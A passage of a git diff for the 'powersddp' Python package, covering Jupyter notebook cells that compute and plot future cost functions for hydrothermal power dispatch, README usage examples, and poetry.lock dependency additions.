bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"sequentialminus\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]]},\"colorway\":[\"#636efa\",\"#EF553B\",\"#00cc96\",\"#ab63fa\",\"#FFA15A\",\"#19d3f3\",\"#FF6692\",\"#B6E880\",\"#FF97FF\",\"#FECB52\"],\"font\":{\"color\":\"#2a3f5f\"},\"geo\":{\"bgcolor\":\"white\",\"lakecolor\":\"white\",\"landcolor\":\"#E5ECF6\",\"showlakes\":true,\"showland\":true,\"subunitcolor\":\"white\"},\"hoverlabel\":{\"align\":\"left\"},\"hovermode\":\"closest\",\"mapbox\":{\"style\":\"light\"},\"paper_bgcolor\":\"white\",\"plot_bgcolor\":\"#E5ECF6\",\"polar\":{\"angularaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"radialaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"scene\":{\"xaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"yaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"},\"zaxis\":{\"backgroundcolor\":\"#E5ECF6\",\"gridcolor\":\"white\",\"gridwidth\":2,\"linecolor\":\"white\",\"showbackground\":true,\"ticks\":\"\",\"zerolinecolor\":\"white\"}},\"shapedefaults\":{\"line\":{\"color\":\"#2a3f5f\"}},\"ternary\":{\"aaxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"baxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"},\"bgcolor\":\"#E5ECF6\",\"caxis\":{\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\"}},\"title\":{\"x\":0.05},\"xaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2},\"yaxis\":{\"automargin\":true,\"gridcolor\":\"white\",\"linecolor\":\"white\",\"ticks\":\"\",\"title\":{\"standoff\":15},\"zerolinecolor\":\"white\",\"zerolinewidth\":2}}},\"title\":{\"text\":\"Future Cost Function\"},\"xaxis\":{\"anchor\":\"y\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis2\":{\"anchor\":\"y2\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"xaxis3\":{\"anchor\":\"y3\",\"domain\":[0.0,1.0],\"title\":{\"text\":\"Final Volume [hm3]\"}},\"yaxis\":{\"anchor\":\"x\",\"domain\":[0.7333333333333333,1.0],\"title\":{\"text\":\"$/MW\"}},\"yaxis2\":{\"anchor\":\"x2\",\"domain\":[0.36666666666666664,0.6333333333333333],\"title\":{\"text\":\"$/MW\"}},\"yaxis3\":{\"anchor\":\"x3\",\"domain\":[0.0,0.26666666666666666],\"title\":{\"text\":\"$/MW\"}}}, {\"responsive\": true} ).then(function(){\n",
+ " \n",
+ "var gd = document.getElementById('5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25');\n",
+ "var x = new MutationObserver(function (mutations, observer) {{\n",
+ " var display = window.getComputedStyle(gd).display;\n",
+ " if (!display || display === 'none') {{\n",
+ " console.log([gd, 'removed!']);\n",
+ " Plotly.purge(gd);\n",
+ " observer.disconnect();\n",
+ " }}\n",
+ "}});\n",
+ "\n",
+ "// Listen for the removal of the full notebook cells\n",
+ "var notebookContainer = gd.closest('#notebook-container');\n",
+ "if (notebookContainer) {{\n",
+ " x.observe(notebookContainer, {childList: true});\n",
+ "}}\n",
+ "\n",
+ "// Listen for the clearing of the current output cell\n",
+ "var outputEl = gd.closest('.output');\n",
+ "if (outputEl) {{\n",
+ " x.observe(outputEl, {childList: true});\n",
+ "}}\n",
+ "\n",
+ " }) }; }); </script> </div>"
+ ]
+ },
+ "metadata": {},
+ "output_type": "display_data"
}
],
"source": [
- "import powersddp\n",
+ "from itertools import product\n",
+ "import numpy as np\n",
+ "\n",
+ "n_hgu = len(TestSystem.data['hydro-units'])\n",
+ "n_tgu = len(TestSystem.data['thermal-units'])\n",
+ "\n",
+ "step = 100/(TestSystem.data['discretizations']-1)\n",
+ "discretizations = list(product(np.arange(0,100+step,step), repeat=n_hgu))\n",
"\n",
- "system = powersddp.PowerSystem(path='system.yml')\n",
+ "cuts = []\n",
+ "operation = []\n",
+ "for stage in range(TestSystem.data['stages'],0,-1):\n",
+ " for discretization in discretizations:\n",
+ " \n",
+ " v_i = []\n",
+ " # For Every Hydro Unit\n",
+ " for i, hgu in enumerate(TestSystem.data['hydro-units']):\n",
+ " v_i.append(hgu['v_min'] + (hgu['v_max']-hgu['v_min'])*discretization[i]/100)\n",
+ " \n",
+ " # For Every Scenario\n",
+ " average = 0.\n",
+ " avg_water_marginal_cost = [0 for _ in TestSystem.data[\"hydro-units\"]]\n",
+ " for scenario in range(TestSystem.data['scenarios']):\n",
+ " inflow = []\n",
+ " for i, hgu in enumerate(TestSystem.data['hydro-units']):\n",
+ " inflow.append(hgu['inflow_scenarios'][stage-1][scenario])\n",
+ " \n",
+ " result = dispatch(TestSystem, v_i, inflow, cuts, stage+1)\n",
+ " average += result[\"total_cost\"]\n",
+ " for i, hgu in enumerate(result[\"hydro_units\"]):\n",
+ " avg_water_marginal_cost[i] += hgu[\"water_marginal_cost\"]\n",
"\n",
- "print(\"System Load: {}\\n\"\n",
- " \"Number of HGUs: {}\\n\"\n",
- " \"Number of TGUs: {}\".format(system.data['load'],\n",
- " len(system.data['hydro-units']),\n",
- " len(system.data['thermal-units'])))"
+ " # Calculating the average of the scenarios\n",
+ " average = average/TestSystem.data['scenarios']\n",
+ " coef_b = average\n",
+ " for i, hgu in enumerate(result[\"hydro_units\"]):\n",
+ " # ! Invert the coeficient because of the minimization problem inverts the signal\n",
+ " avg_water_marginal_cost[i] = - avg_water_marginal_cost[i]/TestSystem.data['scenarios']\n",
+ " coef_b -= v_i[i]*avg_water_marginal_cost[i]\n",
+ " \n",
+ " cuts.append({\"stage\": stage, \"coef_b\": coef_b, \"coefs\": avg_water_marginal_cost})\n",
+ " operation.append({'stage': stage, 'discretization': discretization[i], 'v_i': v_i[0], 'average_cost': round(average,2)})\n",
+ "operation_df = pd.DataFrame(operation)\n",
+ "\n",
+ "if n_hgu == 1:\n",
+ " plot_future_cost_function(operation=operation_df)"
]
},
{
"cell_type": "code",
- "execution_count": 1,
- "id": "07837a84-da91-47bf-a749-d4292fde6d57",
+ "execution_count": 13,
+ "id": "87285cd1-3bb7-4c72-bb43-4f2baf6e4077",
"metadata": {},
"outputs": [
{
- "name": "stdout",
- "output_type": "stream",
- "text": [
- "System Load: [50, 50, 50]\n",
- "Number of HGUs: 1\n",
- "Number of TGUs: 2\n"
- ]
+ "data": {
+ "text/html": [
+ "<div>\n",
+ "<style scoped>\n",
+ " .dataframe tbody tr th:only-of-type {\n",
+ " vertical-align: middle;\n",
+ " }\n",
+ "\n",
+ " .dataframe tbody tr th {\n",
+ " vertical-align: top;\n",
+ " }\n",
+ "\n",
+ " .dataframe thead th {\n",
+ " text-align: right;\n",
+ " }\n",
+ "</style>\n",
+ "<table border=\"1\" class=\"dataframe\">\n",
+ " <thead>\n",
+ " <tr style=\"text-align: right;\">\n",
+ " <th></th>\n",
+ " <th>stage</th>\n",
+ " <th>discretization</th>\n",
+ " <th>v_i</th>\n",
+ " <th>average_cost</th>\n",
+ " </tr>\n",
+ " </thead>\n",
+ " <tbody>\n",
+ " <tr>\n",
+ " <th>0</th>\n",
+ " <td>3</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>6725.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>1</th>\n",
+ " <td>3</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>7.75</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>2</th>\n",
+ " <td>3</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>-0.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>3</th>\n",
+ " <td>2</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>11787.50</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>4</th>\n",
+ " <td>2</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>226.93</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>5</th>\n",
+ " <td>2</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>0.62</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>6</th>\n",
+ " <td>1</td>\n",
+ " <td>0.0</td>\n",
+ " <td>20.0</td>\n",
+ " <td>15425.00</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>7</th>\n",
+ " <td>1</td>\n",
+ " <td>50.0</td>\n",
+ " <td>60.0</td>\n",
+ " <td>576.31</td>\n",
+ " </tr>\n",
+ " <tr>\n",
+ " <th>8</th>\n",
+ " <td>1</td>\n",
+ " <td>100.0</td>\n",
+ " <td>100.0</td>\n",
+ " <td>161.68</td>\n",
+ " </tr>\n",
+ " </tbody>\n",
+ "</table>\n",
+ "</div>"
+ ],
+ "text/plain": [
+ " stage discretization v_i average_cost\n",
+ "0 3 0.0 20.0 6725.00\n",
+ "1 3 50.0 60.0 7.75\n",
+ "2 3 100.0 100.0 -0.00\n",
+ "3 2 0.0 20.0 11787.50\n",
+ "4 2 50.0 60.0 226.93\n",
+ "5 2 100.0 100.0 0.62\n",
+ "6 1 0.0 20.0 15425.00\n",
+ "7 1 50.0 60.0 576.31\n",
+ "8 1 100.0 100.0 161.68"
+ ]
+ },
+ "execution_count": 13,
+ "metadata": {},
+ "output_type": "execute_result"
}
],
"source": [
- "import powersddp\n",
- "\n",
- "payload = {'load': [50, 50, 50],\n",
- " 'discretizations': 3,\n",
- " 'stages': 3,\n",
- " 'scenarios': 2,\n",
- " 'outage_cost': 500,\n",
- " 'hydro-units': [{'name': 'HU1',\n",
- " 'v_max': 100,\n",
- " 'v_min': 20,\n",
- " 'prod': 0.95,\n",
- " 'flow_max': 60,\n",
- " 'inflow_scenarios': [[23, 16],\n",
- " [19, 14],\n",
- " [15, 11]]}],\n",
- " 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
- " {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
- "\n",
- "system = powersddp.PowerSystem(data=payload)\n",
- "\n",
- "print(\"System Load: {}\\n\"\n",
- " \"Number of HGUs: {}\\n\"\n",
- " \"Number of TGUs: {}\".format(system.data['load'],\n",
- " len(system.data['hydro-units']),\n",
- " len(system.data['thermal-units'])))"
+ "operation_df"
]
},
{
- "cell_type": "code",
- "execution_count": null,
- "id": "db680eea-a46e-4f24-a739-aae4117bb19e",
+ "cell_type": "markdown",
+ "id": "613592a2-e7e0-4b0a-81b9-a5d0126dde67",
"metadata": {},
- "outputs": [],
- "source": []
+ "source": [
+ "## Considering the Future Cost Function\n",
+ "\n",
+ "### Modelling the cost of water\n",
+ "\n",
+ "Now, let's consider the Future Cost Function to back propagate the solutions. By back propagating we assume that the future cost function of the \"stage ahead\" is used as input for the previous stage solution.\n",
+ "\n",
+ "Assuming that any Future Cost Function is aproximated by a series of straigh line discretizations. Any given point can be identified by a straight line, which is mathematically represented by:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\alpha = a \\cdot v_f + b\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+ "Where $\\alpha$ is cost at a given point of final volume. Where shall find the coeficients $a$ and $b$ \n",
+ "\n",
+ "- $a$: Is the marginal cost of the water, which comes from the solution of the minimization problem.\n",
+ "\n",
+ "If we assume $\\alpha = 75$ and $v_f = 60$ which means a cost of $\\$60.00$ at Final Volume $60 hm^3$, that gives us:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " b = \\alpha - a \\cdot v_f\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+ "> Naturaly, this process is repeated for every discretization used in the problem.\n",
+ "\n",
+ "> $a$ is given by the average value of every scenario considered when calculating the marginal cost of the water.\n",
+ "\n",
+ "If we evaluate for multiple Hydro Units, naturaly:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\alpha =b + \\sum_{i=1}^{n} a_i \\cdot v_{i}\n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+ "Where $n$ = number of Hydro units\n",
+ "\n",
+ "### Considering the cost function in the back propagation\n",
+ "\n",
+ "In the previos stage (back propagating from the end to the beggining) we have the objetive function:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\min \\quad & C_1\\cdot g_{t_1} + C_2\\cdot g_{t_2} + C_{def}\\cdot def + 0.01\\cdot v_v + \\alpha\\\\\n",
+ " \\textrm{s.t.} \\quad & \\\\\n",
+ " \\textrm{hydro balance} \\quad & v_f(i) = v_i(i) + afl(i) - v_t(i) - v_v(i) \\\\\n",
+ " \\textrm{load supplying} \\quad & \\rho\\cdot v_t(i) + g_{t_1} + g_{t_2} + def = \\textrm{load}\\\\\n",
+ " \\textrm{considering the forward state}\\quad & \\\\\n",
+ " \\textrm{for every scenario} `s` \\quad & \\alpha \\geq a^{s} \\cdot v_f(i) + b^{s}\\\\\n",
+ " \\textrm{constraints} \\quad & \\\\\n",
+ " & v_{f_{min}}\\leq v_f(i) \\leq v_{f_{max}}\\\\\n",
+ " & v_{t_{min}}\\leq v_t(i) \\leq v_{t_{max}}\\\\\n",
+ " & v_{v_{min}}\\leq v_v(i) \\leq v_{v_{max}}\\\\\n",
+ " & g_{t_{min}}\\leq g_t^\\ast \\leq g_{t_{max}}\\\\\n",
+ " ^\\ast \\textrm{for each TGU}& \n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$"
+ ]
}
],
"metadata": {
diff --git a/README.md b/README.md
index 9294885..e375b86 100644
--- a/README.md
+++ b/README.md
@@ -27,9 +27,9 @@ There are two ways of initializing a `Power System`. Either by providing a `.yml
### Initializing a `PowerSystem`
```Python
-import powersddp
+import powersddp as psddp
-system = powersddp.PowerSystem(path='system.yml')
+system = psddp.PowerSystem(path='system.yml')
print("System Load: {}\n"
"Number of HGUs: {}\n"
@@ -39,25 +39,23 @@ print("System Load: {}\n"
```
```Python
-import powersddp
-
-payload = {'load': [50, 50, 50],
- 'discretizations': 3,
- 'stages': 3,
- 'scenarios': 2,
- 'outage_cost': 500,
- 'hydro-units': [{'name': 'HU1',
- 'v_max': 100,
- 'v_min': 20,
- 'prod': 0.95,
- 'flow_max': 60,
- 'inflow_scenarios': [[23, 16],
- [19, 14],
- [15, 11]]}],
- 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
- {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
-
-system = powersddp.PowerSystem(data=payload)
+import powersddp as psddp
+
+data = {'load': [50, 50, 50],
+ 'discretizations': 3,
+ 'stages': 3,
+ 'scenarios': 2,
+ 'outage_cost': 500,
+ 'hydro-units': [{'name': 'HU1',
+ 'v_max': 100,
+ 'v_min': 20,
+ 'prod': 0.95,
+ 'flow_max': 60,
+ 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],
+ 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
+ {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
+
+PowerSystem = psddp.PowerSystem(data=data)
print("System Load: {}\n"
"Number of HGUs: {}\n"
@@ -66,4 +64,37 @@ print("System Load: {}\n"
len(system.data['thermal-units'])))
```
+### Dispatching a `PowerSystem`
+
+#### **dispatch()** accepts the following arguments:
+
+- `verbose : bool, optional defaults to False`
+ - Displays the PDDE solution for every stage of the execution. Use with care, solutions of complex systems with too many stages and scenarios might overflow the console.
+
+- `plot : bool, optional, defaults to False`
+ - Displays a sequence of plots showing the future cost function for every stage of the execution.
+
+
+```Python
+import powersddp as psddp
+
+data = {'load': [50, 50, 50],
+ 'discretizations': 3,
+ 'stages': 3,
+ 'scenarios': 2,
+ 'outage_cost': 500,
+ 'hydro-units': [{'name': 'HU1',
+ 'v_max': 100,
+ 'v_min': 20,
+ 'prod': 0.95,
+ 'flow_max': 60,
+ 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],
+ 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},
+ {'name': 'GT2', 'capacity': 10, 'cost': 25}]}
+
+PowerSystem = psddp.PowerSystem(data=data)
+operation = PowerSystem.dispatch()
+
+print(operation)
+```
<!-- <img src="https://render.githubusercontent.com/render/math?math=e^{i \pi} = -1"> -->
diff --git a/poetry.lock b/poetry.lock
index 7944ec3..a74fecf 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -683,6 +683,14 @@ docs = ["sphinx", "nbsphinx", "sphinxcontrib-github-alt", "sphinx-rtd-theme", "m
json-logging = ["json-logging"]
test = ["pytest", "coverage", "requests", "nbval", "selenium", "pytest-cov", "requests-unixsocket"]
+[[package]]
+name = "numpy"
+version = "1.21.1"
+description = "NumPy is the fundamental package for array computing with Python."
+category = "main"
+optional = false
+python-versions = ">=3.7"
+
[[package]]
name = "packaging"
version = "21.0"
@@ -694,6 +702,22 @@ python-versions = ">=3.6"
[package.dependencies]
pyparsing = ">=2.0.2"
+[[package]]
+name = "pandas"
+version = "1.3.2"
+description = "Powerful data structures for data analysis, time series, and statistics"
+category = "main"
+optional = false
+python-versions = ">=3.7.1"
+
+[package.dependencies]
+numpy = ">=1.17.3"
+python-dateutil = ">=2.7.3"
+pytz = ">=2017.3"
+
+[package.extras]
+test = ["hypothesis (>=3.58)", "pytest (>=6.0)", "pytest-xdist"]
+
[[package]]
name = "pandocfilters"
version = "1.4.3"
@@ -741,6 +765,18 @@ category = "dev"
optional = false
python-versions = "*"
+[[package]]
+name = "plotly"
+version = "5.2.1"
+description = "An open-source, interactive data visualization library for Python"
+category = "main"
+optional = false
+python-versions = ">=3.6"
+
+[package.dependencies]
+six = "*"
+tenacity = ">=6.2.0"
+
[[package]]
name = "pluggy"
version = "0.13.1"
@@ -863,7 +899,7 @@ testing = ["argcomplete", "hypothesis (>=3.56)", "mock", "nose", "requests", "xm
name = "python-dateutil"
version = "2.8.2"
description = "Extensions to the standard Python datetime module"
-category = "dev"
+category = "main"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
@@ -874,7 +910,7 @@ six = ">=1.5"
name = "pytz"
version = "2021.1"
description = "World timezone definitions, modern and historical"
-category = "dev"
+category = "main"
optional = false
python-versions = "*"
@@ -969,7 +1005,7 @@ win32 = ["pywin32"]
name = "six"
version = "1.16.0"
description = "Python 2 and 3 compatibility utilities"
-category = "dev"
+category = "main"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*"
@@ -981,6 +1017,17 @@ category = "dev"
optional = false
python-versions = ">=3.5"
+[[package]]
+name = "tenacity"
+version = "8.0.1"
+description = "Retry code until it succeeds"
+category = "main"
+optional = false
+python-versions = ">=3.6"
+
+[package.extras]
+doc = ["reno", "sphinx", "tornado (>=4.5)"]
+
[[package]]
name = "terminado"
version = "0.11.0"
@@ -1114,7 +1161,7 @@ python-versions = "*"
[metadata]
lock-version = "1.1"
python-versions = "^3.8"
-content-hash = "a80ab2d038ebd23b2a35fddb2e703975351608f10eedf2519677c49d97feb518"
+content-hash = "cae2aa10dea3acba3f146c7781ed78b2fb59bceac409a73911ca7d08dbffb158"
[metadata.files]
anyio = [
@@ -1531,10 +1578,61 @@ notebook = [
{file = "notebook-6.4.3-py3-none-any.whl", hash = "sha256:b50eafa8208d5db966efd1caa4076b4dfc51815e02a805b32ecd717e9e6cc071"},
{file = "notebook-6.4.3.tar.gz", hash = "sha256:e6b6dfed36b00cf950f63c0d42e947c101d4258aec21624de62b9e0c11ed5c0d"},
]
+numpy = [
+ {file = "numpy-1.21.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:38e8648f9449a549a7dfe8d8755a5979b45b3538520d1e735637ef28e8c2dc50"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:fd7d7409fa643a91d0a05c7554dd68aa9c9bb16e186f6ccfe40d6e003156e33a"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:a75b4498b1e93d8b700282dc8e655b8bd559c0904b3910b144646dbbbc03e062"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1412aa0aec3e00bc23fbb8664d76552b4efde98fb71f60737c83efbac24112f1"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:e46ceaff65609b5399163de5893d8f2a82d3c77d5e56d976c8b5fb01faa6b671"},
+ {file = "numpy-1.21.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:c6a2324085dd52f96498419ba95b5777e40b6bcbc20088fddb9e8cbb58885e8e"},
+ {file = "numpy-1.21.1-cp37-cp37m-win32.whl", hash = "sha256:73101b2a1fef16602696d133db402a7e7586654682244344b8329cdcbbb82172"},
+ {file = "numpy-1.21.1-cp37-cp37m-win_amd64.whl", hash = "sha256:7a708a79c9a9d26904d1cca8d383bf869edf6f8e7650d85dbc77b041e8c5a0f8"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:95b995d0c413f5d0428b3f880e8fe1660ff9396dcd1f9eedbc311f37b5652e16"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:635e6bd31c9fb3d475c8f44a089569070d10a9ef18ed13738b03049280281267"},
+ {file = "numpy-1.21.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4a3d5fb89bfe21be2ef47c0614b9c9c707b7362386c9a3ff1feae63e0267ccb6"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:8a326af80e86d0e9ce92bcc1e65c8ff88297de4fa14ee936cb2293d414c9ec63"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:791492091744b0fe390a6ce85cc1bf5149968ac7d5f0477288f78c89b385d9af"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0318c465786c1f63ac05d7c4dbcecd4d2d7e13f0959b01b534ea1e92202235c5"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:9a513bd9c1551894ee3d31369f9b07460ef223694098cf27d399513415855b68"},
+ {file = "numpy-1.21.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:91c6f5fc58df1e0a3cc0c3a717bb3308ff850abdaa6d2d802573ee2b11f674a8"},
+ {file = "numpy-1.21.1-cp38-cp38-win32.whl", hash = "sha256:978010b68e17150db8765355d1ccdd450f9fc916824e8c4e35ee620590e234cd"},
+ {file = "numpy-1.21.1-cp38-cp38-win_amd64.whl", hash = "sha256:9749a40a5b22333467f02fe11edc98f022133ee1bfa8ab99bda5e5437b831214"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:d7a4aeac3b94af92a9373d6e77b37691b86411f9745190d2c351f410ab3a791f"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d9e7912a56108aba9b31df688a4c4f5cb0d9d3787386b87d504762b6754fbb1b"},
+ {file = "numpy-1.21.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:25b40b98ebdd272bc3020935427a4530b7d60dfbe1ab9381a39147834e985eac"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:8a92c5aea763d14ba9d6475803fc7904bda7decc2a0a68153f587ad82941fec1"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:05a0f648eb28bae4bcb204e6fd14603de2908de982e761a2fc78efe0f19e96e1"},
+ {file = "numpy-1.21.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f01f28075a92eede918b965e86e8f0ba7b7797a95aa8d35e1cc8821f5fc3ad6a"},
+ {file = "numpy-1.21.1-cp39-cp39-win32.whl", hash = "sha256:88c0b89ad1cc24a5efbb99ff9ab5db0f9a86e9cc50240177a571fbe9c2860ac2"},
+ {file = "numpy-1.21.1-cp39-cp39-win_amd64.whl", hash = "sha256:01721eefe70544d548425a07c80be8377096a54118070b8a62476866d5208e33"},
+ {file = "numpy-1.21.1-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:2d4d1de6e6fb3d28781c73fbde702ac97f03d79e4ffd6598b880b2d95d62ead4"},
+ {file = "numpy-1.21.1.zip", hash = "sha256:dff4af63638afcc57a3dfb9e4b26d434a7a602d225b42d746ea7fe2edf1342fd"},
+]
packaging = [
{file = "packaging-21.0-py3-none-any.whl", hash = "sha256:c86254f9220d55e31cc94d69bade760f0847da8000def4dfe1c6b872fd14ff14"},
{file = "packaging-21.0.tar.gz", hash = "sha256:7dc96269f53a4ccec5c0670940a4281106dd0bb343f47b7471f779df49c2fbe7"},
]
+pandas = [
+ {file = "pandas-1.3.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ba7ceb8abc6dbdb1e34612d1173d61e4941f1a1eb7e6f703b2633134ae6a6c89"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fcb71b1935249de80e3a808227189eee381d4d74a31760ced2df21eedc92a8e3"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fa54dc1d3e5d004a09ab0b1751473698011ddf03e14f1f59b84ad9a6ac630975"},
+ {file = "pandas-1.3.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:34ced9ce5d5b17b556486da7256961b55b471d64a8990b56e67a84ebeb259416"},
+ {file = "pandas-1.3.2-cp37-cp37m-win32.whl", hash = "sha256:a56246de744baf646d1f3e050c4653d632bc9cd2e0605f41051fea59980e880a"},
+ {file = "pandas-1.3.2-cp37-cp37m-win_amd64.whl", hash = "sha256:53b17e4debba26b7446b1e4795c19f94f0c715e288e08145e44bdd2865e819b3"},
+ {file = "pandas-1.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:f07a9745ca075ae73a5ce116f5e58f691c0dc9de0bff163527858459df5c176f"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c9e8e0ce5284ebebe110efd652c164ed6eab77f5de4c3533abc756302ee77765"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:59a78d7066d1c921a77e3306aa0ebf6e55396c097d5dfcc4df8defe3dcecb735"},
+ {file = "pandas-1.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:132def05e73d292c949b02e7ef873debb77acc44a8b119d215921046f0c3a91d"},
+ {file = "pandas-1.3.2-cp38-cp38-win32.whl", hash = "sha256:69e1b2f5811f46827722fd641fdaeedb26002bd1e504eacc7a8ec36bdc25393e"},
+ {file = "pandas-1.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:7996d311413379136baf0f3cf2a10e331697657c87ced3f17ac7c77f77fe34a3"},
+ {file = "pandas-1.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:1738154049062156429a5cf2fd79a69c9f3fa4f231346a7ec6fd156cd1a9a621"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9cce01f6d655b4add966fcd36c32c5d1fe84628e200626b3f5e2f40db2d16a0f"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1099e2a0cd3a01ec62cca183fc1555833a2d43764950ef8cb5948c8abfc51014"},
